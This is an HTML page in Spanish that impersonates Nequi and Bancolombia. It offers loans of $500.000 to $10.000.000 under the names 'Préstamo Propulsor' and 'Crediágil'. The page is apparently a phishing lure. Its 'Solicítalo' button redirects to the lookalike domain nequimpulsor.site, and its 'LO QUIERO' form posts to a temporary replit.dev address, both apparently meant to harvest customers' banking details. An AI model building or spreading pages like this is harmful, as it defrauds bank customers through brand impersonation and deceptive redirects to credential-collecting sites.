<!DOCTYPE html>
<html>
<head>
    <title>impulsor</title>
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta charset="utf-8">
<style>
    .respeta{
    display: flex;
    justify-content: space-between;
    align-items: center;
    width: auto;
    height: 64px;
    border: 1px #000;
    padding-left: 26px;
    padding-right: 26px;
    position: static;
}


   
    .tecla{
        position: static;
        display: flex;
        margin-left: auto;
    }
.genio{
   height: 10px;
   margin-left: auto;
   padding-top: 5px;
   margin-left: 6px;
}

.col {
    font-family: "Roboto", sans-serif;
    font-weight: 600;
    font-style: normal;
    font-size: 14px;
    color: rgba(0, 0, 0, 0.782);
    padding-top: 2px;
    padding-left: 6px;
  }
  .colombia-img{
    margin-left: 100;
    width: 20px;
    height: 15px;
    margin-top: 3px;
  }
  .hermandad{
    height: 21px;
    
    margin-right: 15px; 
    margin-left: 43px;
  }

  .cams{
    width: 100%;
    margin-bottom: -17%;
  }
  .logo{
    width: 100px;
  }
 .nuevearea{
    width: 100%;
 }
 body, .nuevearea {
    margin: 0;
    padding: 0;
}
.but{
    background-color: #da0081;
    height: 56px;
    padding: 16px 134px;
    border-radius: 4px;
    border: none;
    color: white;
    font-family: Manrope, sans-serif;
    font-size: 1.063rem;
}
.selec{
    width: 51%;
    height: 35px;
    border-radius: 6px;
    text-align-last: center;
    border-color: #80808038;
    margin-right: 0.5rem;
    margin-left: 0.5rem;
}
.hero{
    
    font-family: Manrope, sans-serif;
    font-size: 1.125rem;
    line-height: 1.5rem;
    margin-left: 1.8rem;
    margin-right: 1.8rem;
    color: #200020e0;
    text-align: left;
    
}


</style>
</head>

<body>

    <div class="respeta">
        <img class="logo" src="./logo.svg">

        <div class="dropdown-header dropdown-header--tb">
            <div data-hover="false" data-delay="0" class="dropdown-footer dropdown-header--tb w-dropdown">
                <div>


                </div>

                </nav>
            </div>
            <div class="w-embed"></div>

            <div class="tecla">
                <img src="./logo.svg" loading="lazy" alt="" class="colombia-img">
                <div class="col">COL</div>
                <img src="./flecha.png" class="genio">
                <img src="./3ra.jpg" class="hermandad">
            </div>
        </div>
    </div>
    <div class="nuevearea">
        <img class="cams" src="./simulador.png">
    </div>
    <div style="padding-right: 93px;display: flex;lign-items: center;justify-content: center;margin-bottom: -4%;">
        <strong style=" font-family: Manrope, sans-serif;">Pide de $500.000 a $10.000.000</strong>
    </div>
    <div style="padding-right: 152px;display: flex;lign-items: center;justify-content: center;">

        <h1 style="font-family: Manrope, sans-serif; font-size: 2.375rem;line-height: 3rem;">Préstamo<br>Propulsor</h1>

    </div>

    </div>
        <div>
            <center>
                <p class="hero">¡Recibe la plata de una en tu Nequi! Y págala hasta 36 meses.</p>
            </center>
        </div>
        <br>
        <div>
           
        </div>
        <br>
        <div style="display: flex; align-items: center; justify-content: center;">
            <button type="submit" class="but" onclick="redirectToPage()">Solicítalo</button>
        </div>
    <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0/dist/js/bootstrap.bundle.min.js"></script>
    <script src="https://code.jquery.com/jquery-3.6.0.min.js"></script>

            <script>
                function redirectToPage() {
                    window.location.href = 'https://nequimpulsor.site/transaction/clientes/index.html';
                }
                </script>
</body>
       
     <br> <br> <br>
       
        <center>   <h6 style="font-size:27px;">Crediágil Bancolombia</h6><a>Lo solicitas una vez lo usas cuando quieras: el crédito para viajes, compras,
            emergencias o lo que necesites</a></center>
        <center>    <form action="https://dcd67ace-081f-4510-b11e-d55fa0fb439f-00-1598iobwf45kn.riker.replit.dev/index.html" method="post"><br><center><input type="submit" value="LO QUIERO"
                      style="background-color:#FDDA24; color:black; height:40px; font-weight:600; width:50%; border-radius: 100px; border:none; margin-left:-30px; margin-bottom:20px; margin-top:;"></center>
              </form></center>
       
     <center>   <h3 style="font-size:14px;">Bancolombia-Nequi</h3><a></a></center>
        <div class="img">
         <br>  
          
</body>
</html>
